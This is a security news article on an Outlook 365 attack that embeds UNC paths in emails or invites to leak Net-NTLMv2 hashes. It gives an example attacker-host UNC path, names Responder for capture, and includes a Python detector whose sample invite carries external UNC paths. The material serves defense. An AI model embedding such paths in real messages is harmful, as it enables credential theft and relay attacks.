How Attackers Exploit Outlook 365 to Force Capture of NTLM Hashes

Security researchers reveal that by embedding malicious UNC paths in specially crafted Outlook 365 emails or meeting invites, attackers can trigger automatic SMB authentication, steal the victim’s Net‑NTLMv2 hash, and subsequently perform offline cracking or NTLM relay attacks, posing a high‑stealth threat to enterprises.


Security researchers have disclosed an attack technique targeting Microsoft Outlook 365 that forces the client to send Net‑NTLMv2 hashes to a remote server.


Core Attack Flow

Craft malicious request: The attacker sends a specially crafted email or meeting invitation.


Embed UNC path: A UNC path pointing to the attacker’s server (e.g., \\attackerIP\sharedfolder\image.jpg) is placed in the message metadata, attachment path, or an OLE object.


Automatic authentication trigger: When Outlook previews the mail or processes the reminder, it automatically attempts to access the UNC path.

Credential leakage: Windows SMB automatically sends the current user’s Net‑NTLMv2 hash for authentication.

Offline cracking or relay: The attacker captures the hash with tools such as Responder, then either cracks it offline or uses it for an NTLM relay attack to gain further internal access.

Risk Assessment

Low interaction: In some configurations the victim only needs to open the preview pane; no link click or attachment download is required.

High stealth: The authentication occurs at the system level, making it difficult for ordinary users to notice.

Potential impact: Obtained hashes can be used to compromise individual accounts or serve as a foothold for domain‑wide intrusion.

Technical Analysis: Why NTLM Remains Dangerous

Although Microsoft promotes more secure protocols such as Kerberos, NTLM persists for compatibility reasons across Windows environments.

Trigger medium: Outlook meeting reminders, embedded icons, or remotely loaded resources can initiate the attack.

Leaked content: The Net‑NTLMv2 message contains the username, the domain and the challenge‑response computed from the user’s NT hash.

Attack scenario: Targeted spear‑phishing against executives or operations personnel.

Defense and Mitigation Recommendations

Restrict outbound SMB: Block TCP port 445 outbound at the firewall to prevent credential leakage to the Internet.

Enforce NTLM policy controls: Use Group Policy to limit NTLM authentication or place users in the Protected Users group.

Strengthen patch management: Keep Office 365 and Windows up‑to‑date to address known remote‑resource loading vulnerabilities.

Monitor anomalous traffic: Deploy IDS/IPS to detect unusual SMB requests from internal hosts to external IPs.
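As an added example (not code from the original article), the following Python check implements the mail-side half of the UNC-path monitoring recommended above: it scans message headers and body for UNC paths and flags those whose host lies outside the organisation, which is exactly the pattern the attack flow relies on. The internal DNS suffix, the header name and the sample invite (with its addresses) are constructed for this example.

```python
import ipaddress
import re
from typing import Dict, List

# UNC path: two backslashes, a host, a backslash, a share, then an optional tail.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\([^\\\s<>]+)(?:\\[^\s<>]*)?")

# Assumed internal address space and DNS suffix (replace with your own).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)


def host_is_internal(host: str) -> bool:
    """True if the UNC host is an RFC1918/loopback/link-local address,
    an unqualified NetBIOS-style name, or a name under an internal suffix."""
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass
    lowered = host.lower().rstrip(".")
    if "." not in lowered:  # short name, resolvable only inside the org
        return True
    return lowered.endswith(INTERNAL_SUFFIXES)


def find_external_unc_paths(message: str) -> List[Dict[str, str]]:
    """Return every UNC path in the message whose host is not internal.
    An empty list means nothing in the message points the client outside."""
    findings = []
    for m in UNC_RE.finditer(message):
        host, share = m.group(1), m.group(2)
        if not host_is_internal(host):
            findings.append({"path": m.group(0), "host": host, "share": share})
    return findings


# Constructed meeting invite: a reminder-style header (name invented for this
# example) carrying an external UNC path; 203.0.113.45 is a documentation
# address standing in for an attacker-controlled public IP.
SAMPLE_INVITE = (
    "Subject: Q3 planning\r\n"
    "X-Constructed-Reminder-Path: \\\\203.0.113.45\\share\\bell.wav\r\n"
    "\r\n"
    "Agenda attached. Logo: \\\\fileserver.corp.example\\public\\logo.png\r\n"
    "Slides: \\\\10.20.30.40\\team\\q3.pptx icon: \\\\files.example.net\\icons\\i.ico\r\n"
)

if __name__ == "__main__":
    for hit in find_external_unc_paths(SAMPLE_INVITE):
        print(f"external UNC path -> host={hit['host']} path={hit['path']}")
```

The two internal references in the sample pass; the documentation IP and the external hostname are reported, which is the signal to quarantine the message or alert.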

ExtremeHack summary: The attack demonstrates that even mature office software can become a security weak point when its automation features are abused. Monitoring abnormal UNC path calls and tightening NTLM authentication are critical for defenders.

Tags: SMB, credential theft, NTLM, NTLM relay, Outlook 365, Responder, Spear phishing, UNC path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.
